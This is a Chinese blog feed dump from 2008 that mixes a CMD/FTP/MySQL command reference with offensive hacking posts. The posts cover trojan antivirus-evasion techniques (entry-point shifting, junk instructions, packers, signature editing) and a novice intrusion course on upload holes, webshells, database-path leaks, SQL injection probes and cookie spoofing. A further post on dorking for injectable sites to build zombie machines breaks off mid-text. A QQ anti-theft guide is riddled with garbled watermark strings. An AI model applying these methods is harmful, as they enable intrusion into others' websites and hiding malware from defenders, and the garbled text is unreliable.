<BR>title&nbsp;标题名字&nbsp;更改CMD窗口标题名字&nbsp; <BR>color&nbsp;颜色值&nbsp;设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白&nbsp; <BR>prompt&nbsp;名称&nbsp;更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\&nbsp;)&nbsp; <BR>print&nbsp;文件名&nbsp;打印文本文件&nbsp; <BR>ver&nbsp;在DOS窗口下显示版本信息&nbsp; <BR>winver&nbsp;弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）&nbsp; <BR>format&nbsp;盘符&nbsp;/FS:类型&nbsp;格式化磁盘,类型:FAT、FAT32、NTFS&nbsp;,例：Format&nbsp;D:&nbsp;/FS:NTFS&nbsp; <BR>md&nbsp;目录名&nbsp;创建目录&nbsp; <BR>replace&nbsp;源文件&nbsp;要替换文件的目录&nbsp;替换文件&nbsp; <BR>ren&nbsp;原文件名&nbsp;新文件名&nbsp;重命名文件名&nbsp; <BR>tree&nbsp;以树形结构显示出目录，用参数-f&nbsp;将列出第个文件夹中文件名称&nbsp; <BR>type&nbsp;文件名&nbsp;显示文本文件的内容&nbsp; <BR>more&nbsp;文件名&nbsp;逐屏显示输出文件&nbsp; <BR>doskey&nbsp;要锁定的命令＝字符&nbsp; <BR>doskey&nbsp;要解锁命令=&nbsp;为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey&nbsp;dir=entsky&nbsp;(不能用doskey&nbsp;dir=dir)；解锁：doskey&nbsp;dir=&nbsp; <BR>taskmgr&nbsp;调出任务管理器&nbsp; <BR>chkdsk&nbsp;/F&nbsp;D:&nbsp;检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误&nbsp; <BR>tlntadmn&nbsp;telnt</FONT><A class=channel_keylink href="http://www.3800hk.com/"><FONT face=黑体 color=#eeeeee size=2>服务</FONT></A><FONT face=黑体 color=#eeeeee size=2>admn,键入tlntadmn选择3，再选择8,就可以更改telnet</FONT><A class=channel_keylink href="http://www.3800hk.com/"><FONT face=黑体 color=#eeeeee size=2>服务</FONT></A><FONT face=黑体 color=#eeeeee size=2>默认端口23为其它任何端口&nbsp; <BR>exit&nbsp;退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe&nbsp; <BR>path&nbsp;路径\可执行文件的文件名&nbsp;为可执行文件设置一个路径。&nbsp; <BR>cmd&nbsp;启动一个win2K命令解释窗口。参数：/eff、/en&nbsp;关闭、开启命令扩展；更我详细说明见cmd&nbsp;/?&nbsp; <BR>regedit&nbsp;/s&nbsp;注册表文件名&nbsp;导入注册表；参数/S指安静模式导入，无任何提示；&nbsp; <BR>regedit&nbsp;/e&nbsp;注册表文件名&nbsp;导出注册表&nbsp; <BR>cacls&nbsp;文件名&nbsp;参数&nbsp;显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D&nbsp;用户名:设定拒绝某用户访问；/P&nbsp;用户名:perm&nbsp;替换指定用户的访问权限；/G&nbsp;用户名:perm&nbsp;赋予指定用户访问权限；Perm&nbsp;可以是:&nbsp;N&nbsp;无，R&nbsp;读取，&nbsp;W&nbsp;写入，&nbsp;C&nbsp;更改(写入)，F&nbsp;完全控制；例：cacls&nbsp;D:\test.txt&nbsp;/D&nbsp;pub&nbsp;设定d:\test.txt拒绝pub用户访问。&nbsp; <BR>cacls&nbsp;文件名&nbsp;查看文件的访问用户权限列表&nbsp; <BR>REM&nbsp;文本内容&nbsp;在批处理文件中添加注解&nbsp; <BR>netsh&nbsp;查看或更改本地</FONT><A class=channel_keylink href="http://www.3800hk.com/"><FONT face=黑体 color=#eeeeee size=2>网络</FONT></A><FONT face=黑体 color=#eeeeee size=2>配置情况&nbsp; <BR>IIS</FONT><A class=channel_keylink href="http://www.3800hk.com/"><FONT face=黑体 color=#eeeeee size=2>服务</FONT></A><FONT face=黑体 color=#eeeeee size=2>命令：&nbsp; <BR>iisreset&nbsp;/reboot&nbsp;重启win2k计算机（但有提示系统将重启信息出现）&nbsp; <BR>iisreset&nbsp;/start或stop&nbsp;启动（停止）所有Internet</FONT><A class=channel_keylink href="http://www.3800hk.com/"><FONT face=黑体 color=#eeeeee size=2>服务</FONT></A><FONT face=黑体 color=#eeeeee size=2>&nbsp; <BR>iisreset&nbsp;/restart&nbsp;停止然后重新启动所有Internet</FONT><A class=channel_keylink href="http://www.3800hk.com/"><FONT face=黑体 color=#eeeeee size=2>服务</FONT></A><FONT face=黑体 color=#eeeeee size=2>&nbsp; <BR>iisreset&nbsp;/status&nbsp;显示所有Internet</FONT><A class=channel_keylink href="http://www.3800hk.com/"><FONT face=黑体 color=#eeeeee size=2>服务</FONT></A><FONT face=黑体 color=#eeeeee size=2>状态&nbsp; <BR>iisreset&nbsp;/enable或disable&nbsp;在本地系统上启用（禁用）Internet</FONT><A class=channel_keylink href="http://www.3800hk.com/"><FONT face=黑体 color=#eeeeee size=2>服务</FONT></A><FONT face=黑体 color=#eeeeee size=2>的重新启动&nbsp; <BR>iisreset&nbsp;/rebootonerror&nbsp;当启动、停止或重新启动Internet</FONT><A class=channel_keylink href="http://www.3800hk.com/"><FONT face=黑体 color=#eeeeee size=2>服务</FONT></A><FONT face=黑体 color=#eeeeee size=2>时，若发生错误将重新开机&nbsp; <BR>iisreset&nbsp;/noforce&nbsp;若无法停止Internet</FONT><A class=channel_keylink href="http://www.3800hk.com/"><FONT face=黑体 color=#eeeeee size=2>服务</FONT></A><FONT face=黑体 color=#eeeeee size=2>，将不会强制终止Internet</FONT><A class=channel_keylink href="http://www.3800hk.com/"><FONT face=黑体 color=#eeeeee size=2>服务</FONT></A><FONT face=黑体 color=#eeeeee size=2>&nbsp; <BR>iisreset&nbsp;/timeout&nbsp;Val在到达逾时间（秒）时，仍未停止Internet</FONT><A class=channel_keylink href="http://www.3800hk.com/"><FONT face=黑体 color=#eeeeee size=2>服务</FONT></A><FONT face=黑体 color=#eeeeee size=2>，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。&nbsp; <BR>FTP&nbsp;命令：&nbsp;(后面有详细说明内容)&nbsp; <BR>ftp的命令行格式为:&nbsp; <BR>ftp&nbsp;－v&nbsp;－d&nbsp;－i&nbsp;－n&nbsp;－g[主机名]&nbsp;－v&nbsp;显示远程</FONT><A class=channel_keylink href="http://www.3800hk.com/"><FONT face=黑体 color=#eeeeee size=2>服务</FONT></A><FONT face=黑体 color=#eeeeee size=2>器的所有响应信息。&nbsp; <BR>－d&nbsp;使用调试方式。&nbsp; <BR>－n&nbsp;限制ftp的</FONT><A class=channel_keylink href="http://www.3800hk.com/"><FONT face=黑体 color=#eeeeee size=2>自动</FONT></A><FONT face=黑体 color=#eeeeee size=2>登录,即不使用.netrc文件。&nbsp; <BR>－g&nbsp;取消全局文件名。&nbsp; <BR>help&nbsp;[命令]&nbsp;或&nbsp;？[命令]&nbsp;查看命令说明&nbsp; <BR>bye&nbsp;或&nbsp;quit&nbsp;终止主机FTP进程,并退出FTP管理方式.&nbsp; <BR>pwd&nbsp;列出当前远端主机目录&nbsp; <BR>put&nbsp;或&nbsp;send&nbsp;本地文件名&nbsp;[上传到主机上的文件名]&nbsp;将本地一个文件传送至远端主机中&nbsp; <BR>get&nbsp;或&nbsp;recv&nbsp;[远程主机文件名]&nbsp;[下载到本地后的文件名]&nbsp;从远端主机中传送至本地主机中&nbsp; <BR>mget&nbsp;[remote-files]&nbsp;从远端主机接收一批文件至本地主机&nbsp; <BR>mput&nbsp;local-files&nbsp;将本地主机中一批文件传送至远端主机&nbsp; <BR>dir&nbsp;或&nbsp;ls&nbsp;[remote-directory]&nbsp;[local-file]&nbsp;列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件&nbsp; <BR>ascii&nbsp;设定以ASCII方式传送文件(缺省值)&nbsp; <BR>bin&nbsp;或&nbsp;image&nbsp;设定以二进制方式传送文件&nbsp; <BR>bell&nbsp;每完成一次文件传送,报警提示&nbsp; <BR>cdup&nbsp;返回上一级目录&nbsp; <BR>close&nbsp;中断与远程</FONT><A class=channel_keylink href="http://www.3800hk.com/"><FONT face=黑体 color=#eeeeee size=2>服务</FONT></A><FONT face=黑体 color=#eeeeee size=2>器的ftp会话(与open对应)&nbsp; <BR>open&nbsp;host[port]&nbsp;建立指定ftp</FONT><A class=channel_keylink href="http://www.3800hk.com/"><FONT face=黑体 color=#eeeeee size=2>服务</FONT></A><FONT face=黑体 color=#eeeeee size=2>器连接,可指定连接端口&nbsp; <BR>delete&nbsp;删除远端主机中的文件&nbsp; <BR>mdelete&nbsp;[remote-files]&nbsp;删除一批文件&nbsp; <BR>mkdir&nbsp;directory-name&nbsp;在远端主机中建立目录&nbsp; <BR>rename&nbsp;[from]&nbsp;[to]&nbsp;改变远端主机中的文件名&nbsp; <BR>rmdir&nbsp;directory-name&nbsp;删除远端主机中的目录&nbsp; <BR>status&nbsp;显示当前FTP的状态&nbsp; <BR>system&nbsp;显示远端主机系统类型&nbsp; <BR>user&nbsp;user-name&nbsp;[password]&nbsp;[account]&nbsp;重新以别的用户名登录远端主机&nbsp; <BR>open&nbsp;host&nbsp;[port]&nbsp;重新建立一个新的连接&nbsp; <BR>prompt&nbsp;交互提示模式&nbsp; <BR>macdef&nbsp;定义宏命令&nbsp; <BR>lcd&nbsp;改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录&nbsp; <BR>chmod&nbsp;改变远端主机的文件权限&nbsp; <BR>case&nbsp;当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母&nbsp; <BR>cd&nbsp;remote－dir&nbsp;进入远程主机目录&nbsp; <BR>cdup&nbsp;进入远程主机目录的父目录&nbsp; <BR>!&nbsp;在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip&nbsp; <BR>MYSQL&nbsp;命令：&nbsp; <BR>mysql&nbsp;-h主机地址&nbsp;-u用户名&nbsp;－p密码&nbsp;连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。&nbsp; <BR>（例：mysql&nbsp;-h110.110.110.110&nbsp;-Uroot&nbsp;-P123456&nbsp; <BR>注:u与root可以不用加空格，其它也一样）&nbsp; <BR>exit&nbsp;退出MYSQL&nbsp; <BR>mysqladmin&nbsp;-u用户名&nbsp;-p旧密码&nbsp;password&nbsp;新密码&nbsp;修改密码&nbsp; <BR>grant&nbsp;select&nbsp;on&nbsp;</FONT><A class=channel_keylink href="http://www.3800hk.com/"><FONT face=黑体 color=#eeeeee size=2>数据</FONT></A><FONT face=黑体 color=#eeeeee size=2>库.*&nbsp;to&nbsp;用户名@登录主机&nbsp;identified&nbsp;by&nbsp;\"密码\";&nbsp;增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符）&nbsp; <BR>show&nbsp;databases;&nbsp;显示</FONT><A class=channel_keylink href="http://www.3800hk.com/"><FONT face=黑体 color=#eeeeee size=2>数据</FONT></A><FONT face=黑体 color=#eeeeee size=2>库列表。刚开始时才两个</FONT><A class=channel_keylink href="http://www.3800hk.com/"><FONT face=黑体 color=#eeeeee size=2>数据</FONT></A><FONT face=黑体 color=#eeeeee size=2>库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作.</FONT></P>]]></description>
<author>xuliang</author>
<pubDate>2008-2-4 20:18:00</pubDate>
</item>
<item>
<title><![CDATA[木马免杀方法总结篇]]></title>
<link>http://xuliang.bokemx.com/200824201620.html</link>
<description><![CDATA[<FONT face=黑体 color=#eeeeee size=2>一.入口点加1免杀法:<BR>1.用到工具PEditor<BR>2.特点:非常简单实用,但有时还会被卡巴查杀<BR>3.操作要点:用PEditor打开无壳木马程序,把原入口点加1即可<BR><BR>二.变化入口地址免杀法:<BR>1.用到工具:OllyDbg,PEditor<BR>2.特点:操作也比较容易,而且免杀效果比入口点加1点要佳.<BR>3.操作要点:用OD载入无壳的木马程序,把入口点的前二句移到零区域去执行,然后又跳回到入口点的下面第三句继续执行.最后用PEditor把入口点改成零区域的地址.<BR><BR>三.加花指令法免杀法:<BR>1.用到工具:OllyDbg,PEditor<BR>2.特点:免杀通用性非常好,加了花指令后,就基本达到大量杀毒软件的免杀.<BR>3.操作要点:用OD打开无壳的木马程序,找到零区域,把我们准备好的花指令填进去填好后又跳回到入口点,保存好后,再用PEditor把入口点改成零区域处填入花指令的着地址.<BR><BR>四.加壳或加伪装壳免杀法:<BR>1.用到工具:一些冷门壳,或加伪装壳的工具,比如木马彩衣等.<BR>2.特点:操作简单化,但免杀的时间不长,可能很快被杀,也很难躲过卡巴的追杀<BR>3.操作要点:为了达到更好的免杀效果可采用多重加壳,或加了壳后在加伪装壳的免杀效果更佳<BR><BR>五.打乱壳的头文件或壳中加花免杀法:<BR>1.用到工具:秘密行动 ,UPX加壳工具.<BR>2.特点:操作也是傻瓜化,免杀效果也正当不错,特别对卡巴的免杀效果非常好<BR>3.操作要点:首先一定要把没加过壳的木马程序用UPX加层壳,然后用秘密行动这款工具中的SCramble功能进行把UPX壳的头文件打乱,从而达到免杀效果.<BR><BR>六.修改文件特征码免杀法:<BR>1.用到工具:特征码定位器,OllyDbg<BR>2.特点:操作较复杂,要定位修改一系列过程,而且只针对每种杀毒软件的免杀,要达到多种杀毒软件的免杀,必需修改各种杀毒软件的特征码.但免杀效果好<BR><BR>操作要点:对某种杀毒软件的特征码的定位到修改一系列慢长过程</FONT>]]></description>
<author>xuliang</author>
<pubDate>2008-2-4 20:16:00</pubDate>
</item>
<item>
<title><![CDATA[常用网站入侵手法讲座]]></title>
<link>http://xuliang.bokemx.com/20082419514.html</link>
<description><![CDATA[<DIV><FONT face=黑体 color=#ffffff size=2>首先介绍下什么样的站点可以入侵：必须是动态的网站 比如 asp php jsp 这种形式的站点 后缀为.htm的站点劝大家还是不要入侵了吧（入侵几率几乎为0） 入侵介绍： 1。上传漏洞 2。暴库 3。注入 4。旁注 5。COOKIE诈骗 1：上传漏洞，这个漏洞在DVBBS6.0时代被黑客们利用的最为猖獗，利用上传漏洞可以直接得到WEBSHELL，危害等级超级高，现在的入侵中上传漏洞也是常见的漏洞。 怎样利用：在网站的地址栏中网址后加上/upfile.asp如果显示 上传格式不正确[重新上传] 这样的字样8成就是有长传漏洞了找个可以上传的工具直接可以得到WEBSHELL 工具介绍：上传工具 老兵的上传工具 DOMAIN3.5 这两个软件都可以达到上传的目的 用NC也可以提交 </FONT></DIV>
<DIV><FONT face=黑体 color=#ffffff size=2>WEBSHELL是什么：WEBSHELL在上节课简单的介绍了下，许多人都不理解，这里就详细讲下，其实WEBSHELL并不什么深奥的东西，是个WEB的权限，可以管理WEB，修改主页内容等权限，但是并没有什么特别高的权限，（这个看管理员的设置了）一般修改别人主页大多都需要这个权限，接触过WEB木马的朋友可能知道（比如老兵的站长助手就是WEB木马 海阳2006也是 WEB木马）我们上传漏洞最终传的就是这个东西，有时碰到权限设置不好的服务器可以通过WEBSHELL得到最高权限。 </FONT></DIV>
<DIV><FONT face=黑体 color=#ffffff size=2>2。暴库：这个漏洞现在很少见了，但是还有许多站点有这个漏洞可以利用，暴库就是提交字符得到数据库文件，得到了数据库文件我们就直接有了站点的前台或者后台的权限了。 </FONT></DIV>
<DIV><FONT face=黑体 color=#ffffff size=2>暴库方法：比如一个站的地址为 http://www.xxx.com/dispbbs.asp?boardID=7&amp;ID=161 我门就可以把com/dispbbs中间的/换成%5c 如果有漏洞直接得到数据库的绝对路径 用寻雷什么的下载下来就可以了 还有种方法就是利用默认的数据库路径 http://www.xxx.com/ 后面加上 conn.asp 如果没有修改默认的数据库路径也可以得到数据库的路径（注意：这里的/也要换成%5c） </FONT></DIV>
<DIV><FONT face=黑体 color=#ffffff size=2>为什么换成%5c：因为在ASCII码里/等于%5c，有时碰到数据库名字为/#abc.mdb的为什么下不了？ 这里需要把#号换成%23就可以下载了，为什么我暴出的数据库文件是以。ASP结尾的？我该怎么办？这里可以在下载时把。ASP换成。MDB 这样就可以下载了如果还下载不了可能作了防下载。 </FONT></DIV>
<DIV><FONT face=黑体 color=#ffffff size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#ffffff size=2>3。注入漏洞：这个漏洞是现在应用最广泛，杀伤力也很大的漏洞，可以说微软的官方网站也存在着注入漏洞。注入漏洞是因为字符过滤不严禁所造成的，可以得到管理员的帐号密码等相关资料。 </FONT></DIV>
<DIV><FONT face=黑体 color=#ffffff size=2>怎样利用：我先介绍下怎样找漏洞比如这个网址 http://www.xxx.com/dispbbs.asp?boardID=7&amp;ID=161 后面是以ID=数字形式结尾的站我们可以手动在后面加上个 and 1=1 看看 如果显示正常页面 再加上个and 1=2 来看看 如果返回正常页面说明没有漏洞 如果返回错误页面说明存在注入漏洞。如果加and 1=1 返回错误页面说明也没有漏洞，知道了站点有没有漏洞我门就可以利用了 可以手工来猜解也可以用工具现在工具比较多（NBSI NDSI 啊D DOMAIN等）都可以用来猜解帐号密码，因为是菜鸟接触，我还是建议大家用工具，手工比较烦琐。 </FONT></DIV>
<DIV><FONT face=黑体 color=#ffffff size=2></FONT></DIV>
<DIV><FONT face=黑体 color=#ffffff size=2>4。旁注：我们入侵某站时可能这个站坚固的无懈可击，我们可以找下和这个站同一服务器的站点，然后在利用这个站点用提权，嗅探等方法来入侵我们要入侵的站点。打个形象的比喻， 比如你和我一个楼 我家很安全,而你家呢 却漏洞百出 现在有个贼想入侵我家 他对我家做了监视(也就是扫描)发现没有什么可以利用的东西 那么这个贼发现你家和我家一个楼 你家很容易就进去了 他可以先进入你家 然后通过你家得到整个楼的钥匙(系统权限) 这样就自然得到我的钥匙了 就可以进入我的家(网站) </FONT></DIV>
<DIV><FONT face=黑体 color=#ffffff size=2>工具介绍：还是名小子的DOMIAN3.5不错的东西 ，可以检测注入 可以旁注 还可以上传！ </FONT></DIV>
<DIV><FONT face=黑体 color=#ffffff size=2>5.COOKIE诈骗：许多人不知道什么是COOKIE，COOKIE是你上网时由网站所为你发送的值记录了你的一些资料，比如IP，姓名什么的。 </FONT></DIV>
<DIV><FONT face=黑体 color=#ffffff size=2>怎样诈骗呢？如果我们现在已经知道了XX站管理员的站号和MD5密码了 但是破解 不出来密码 （MD5是加密后的一个16位的密码）我们就可以用COOKIE诈骗来实现，把自己的ID修改成管理员的，MD5密码也修改成他的，有工具可以修改COOKIE 这样就答到了COOKIE诈骗的目的，系统以为你就是管理员了。 </FONT></DIV>
<DIV><FONT face=黑体 color=#ffffff size=2>今天的介绍就到这里了 比较基础，都是概念性的东西，所有的都是我的个人理解，如有不正确的地方希望大家指出（个人认为就是 为什么换成%5c 这里有点问题）。 </FONT></DIV>
<DIV><FONT face=黑体 color=#0000ff size=2></FONT></DIV>]]></description>
<author>xuliang</author>
<pubDate>2008-2-4 19:51:00</pubDate>
</item>
<item>
<title><![CDATA[菜鸟QQ防黑大全]]></title>
<link>http://xuliang.bokemx.com/200824194754.html</link>
<description><![CDATA[<DIV><FONT face=黑体><FONT color=#eeeeee size=2>它在[url=javascript:;]<U><B>网络</B></U>[/url]的特殊地位，受到越来越多的[url=javascript:;]<U><B>黑客</B></U>[/url]的关注，也越来越多的菜鸟们QQ频频被盗，实在冒火。下面我就将我在QQ防黑方面的经验和一些很有用的小点子拿来给菜鸟们分享，希望能对广大的菜鸟们有所帮助 </FONT></FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>常见QQ攻击方法： </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>;Ivhv4H*x/wg01、暴力破解黑客X档案官方站L\Z oJ*f </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>用暴力破解 好的密码词典来对本地的QQ密码文件或在线QQ配合好的密码词典进行暴力破解。黑客X档案官方站7kT+Sv l"Pp| mO'A </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>黑客X档案官方站Q6I {1Psd8RB </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>2、专门的破解工具 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>t+Vk2qt0这类软件一种是直接破解出曾经选择过“下次登录不显示登录框”的本地QQ号 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>"v1o%Z:b;T2A |0的最后一次的密码，一种是使用了叫做“隐身穿墙术”的QQ黑软，通过一个独立的执行文件调用QQ主程序，跳过密码验证直接登录QQ。 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>1nS5w0~L:Hr Z0黑客X档案官方站b6f?Nh y </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>3、使用木马程序 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>vLB3sXn6L4bz7?0通过诱骗目标去浏览藏有QQ木马的网页，让木马自动下载并运行，或向目标发送绑捆了木马的软件、图片等文件让其执行。木马通过获取QQ登录窗口密码或记录击键记录盗取密码，并发向指定Email或保存在计算机的指定位置。 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>5f XZ*T0Z|y~|eu0黑客X档案官方站e m.Hv4w t.A[ </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>4、破解注册QQ密码保护登记的Emai密码黑客X档案官方站)~/{Z'[(KW </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>通过破解目标注册QQ密码保护邮箱的密码来获得你的QQ密码。黑客X档案官方站2]8D%h0fS&amp;_ ID </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>:w(E3Ij\:Z05、利用QQ软件本身的漏洞黑客X档案官方站0Zd[8Sy)a9o b@ </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>利用QQ软件本身的漏洞来向目标发送攻击信息，使其被迫下线或造成QQ程序错误退出。 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>z[ C {&amp;] bx G/T0 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>(N$[OI ZR0防范措施：黑客X档案官方站$]'SS7c#X </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>一、最最基本的防范：一定要申请密码保护。（千万不要亡羊补牢哦）黑客X档案官方站 [9`^(auFiPy V </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>二、针锋相对的防范： </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>[7SG"JbU01、对于暴力破解：黑客X档案官方站lDEvT/]&amp;e e9yz </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>①一个复杂的密码是关键，8位以上的数字 大小写字母 符号，这样的设置是对暴力破解者耐心的一个挑战，要是在线破解这也将是对其经济实力的挑战。 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>+R a+S3g"K/F\/_-J0②下线后删除保存有你QQ号码记录的文件夹，防止本地密码文件的破解。 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>*J9]:M F3k0c0③登录QQ时可以在号码前加很多的0登录，这样可以躲过qqdreams等一类的在线破解软件对你的QQ号的探测。 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>*q%T(C h(g-C:i0④使用QQ代理，不轻易和对方进行“二人世界”聊天以隐藏自己的真实ip，避免在线破解。黑客X档案官方站 a LF6dRHOQ </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>2、对于专门的破解软件：黑客X档案官方站T'Nt PT-@|W'oJy </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>①下线后删除保存有你QQ号码记录的文件夹。黑客X档案官方站S^l)z)A$h a(ts </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>②登录QQ时不要选择保存密码。黑客X档案官方站D P"z-Fy </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>③在QQ所在的文件夹下，删除子文件夹中的OICQ2000.cfg文件，这样下次启动QQ将只能使用“注册向导登录”，这将使“隐身穿墙术”失效。黑客X档案官方站"`#SR0pLC)ZKj4{ </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>3、对于木马：黑客X档案官方站%dh-owC </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>这是目前最流行的盗号方式。黑客X档案官方站j0?'a G:Hs.Xr7U </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>①安装杀毒软件和_blank"&gt;防火墙，起用他们的实时监控功能，及时升级毒库。黑基的QQV2004也是一款不错的QQ保护软件。 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>(_J0}H U)Q0②不要随意浏览网友发来的网页。如果实在战胜不了你的好奇心，那你可以先将IE的[url=javascript:;]<U><B>安全</B></U>[/url]级别改为“高”，禁用IE中的ActiveX、活动脚本和文件下载，然后再去浏览。当然你要是很精通网页[url=javascript:;]<U><B>编程</B></U>[/url]的话，你也可以先用一些能直接读取网页源[url=javascript:;]<U><B>代码</B></U>[/url]的工具（电猫工作室就有一款不错的）读出源代码，分析代码后再决定是否浏览。 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>v/AX+Z3n1F6?"J}0③不要随意运行网友发来的文件。在资源管理器或我的[url=javascript:;]<U><B>电脑</B></U>[/url]中，将“文件夹”选项中的“查看”设置成不隐藏已知文件扩展名。对发来的文件进行病毒扫描，特别注意*.JPG.EXE的文件，十有八九都有问题。对于winrar的自解压文件不要去双击解压，点鼠标右键选择“用winrar打开...”。更高超一点的就是对.exe和.BMP的文件进行脱壳和用16进制编辑器来分析，我想这些就不是一般的菜鸟能及的了。 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>O$Bh3xk.b,~0④对于键盘记录工具，可以通过交换密码的输入顺序来迷惑它。如：123的密码，我可以先输2，然后用鼠标将光标移到2的左边输1，最后将光标移到2的右边输3，这样它就会误认为密码是213。记住一定要用鼠标移动光标哦。还有一个方法就是你打开记事本，将密码写上，然后用“复制”“粘贴”将密码粘贴到输入框，这样还可以方便的使用中文密码哦。 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>A3} }:M;GqE0⑤对于那些直接获取输入框中密码的木马，菜鸟能使用的的方法就是使用升级了最新毒库的杀毒软件，用_blank"&gt;防火墙阻止不明程序发送email，下网后查找C盘中可疑的*.log、*log.txt文件并删除。当然老鸟们可能会使用查杀木马的一般步骤，从[url=javascript:;]<U><B>系统</B></U>[/url]进程、启动、注册表、系统文件等方面进行彻底的查杀。熟悉ActiveX控件的，还可以做一个程序对向windows的Edit控件发送WM_GETTEXT或EM_GETLINE消息者的身份进行检查。 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>^s8`$m(b&amp;Z:@XP| Z04、对注册QQ密码保护登记的Email破解 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>8Y`nN1r0①使用复杂的email密码。黑客X档案官方站+FL-c V~;eV </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>②QQ资料中的email不要与申请密码保护的email相同。黑客X档案官方站 p BZyM-P%d6AeI </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>5、对于QQ本身的漏洞黑客X档案官方站rUwD6h </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>这是目前成功率最高的攻击方式。 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>+R\)uW4dlZ5Ox0①临时的解决方法：将攻击者放入黑名单。 </FONT></DIV>
<DIV><FONT face=黑体 color=#0000ff size=2><FONT color=#eeeeee>I0p2^ci,y Zk0②根本的解决方式：及时下载软件补丁。黑客X档案官方站|@e@"U</FONT> </FONT></DIV>]]></description>
<author>xuliang</author>
<pubDate>2008-2-4 19:47:00</pubDate>
</item>
<item>
<title><![CDATA[菜鸟＋Sa＋注入工具组合＝肉鸡成群]]></title>
<link>http://xuliang.bokemx.com/200824194612.html</link>
<description><![CDATA[<DIV align=left><FONT face=黑体 color=#ffffff size=2>现在，注入漏洞异常火爆，不少黑友都利用该漏洞过了一把黑客瘾，并拥有了不少自己的肉鸡。不过对于小菜们来说，注入入侵也并不是那么一帆风顺，尤其是在注入点的寻找以及获得WebShell后的提升权限问题上。在这里，我给广大初学注入入侵的小菜们提供一种快速获取sa权限注入点入侵目标主机的办法。高手可以跳过本文，或者就当是复习吧。 </FONT></DIV>
<DIV align=left><FONT face=黑体 color=#ffffff size=2>获取注入点的方法不外乎两种：手工寻找和利用注入工具寻找。对于前者，多数是用搜索引擎来找特定的网址（形如xxx.asp?xxid=），对于后者，则是针对具体某个站点用注入工具扫描注入点。不过，你有没有考虑过把这两种方法结合起来使用呢？我就倾向于二者的组合使用，方法如下： </FONT></DIV>
<DIV align=left><FONT face=黑体 color=#ffffff size=2>在阿D注入工具中的“扫描注入点”功能模块的地址栏里输入并转到google的网址，选择“高级搜索”，在搜索结果栏中选择“100项结果”，语言选择“简体中文”，关键字填：xxx inurl:asp或是inurl:XX.asp?id=、inurl:xxx.asp?xxid等，这些都是我们常见的可能存在注入点的网址形式，我输入的是ert inurl:asp（有人说这个关键字容易找到sa权限，不知是真是假，但我确实找到了不少）。点击搜索后，在注入点一栏中马上就会显示出N多的有注入点的网址。 </FONT></DIV>
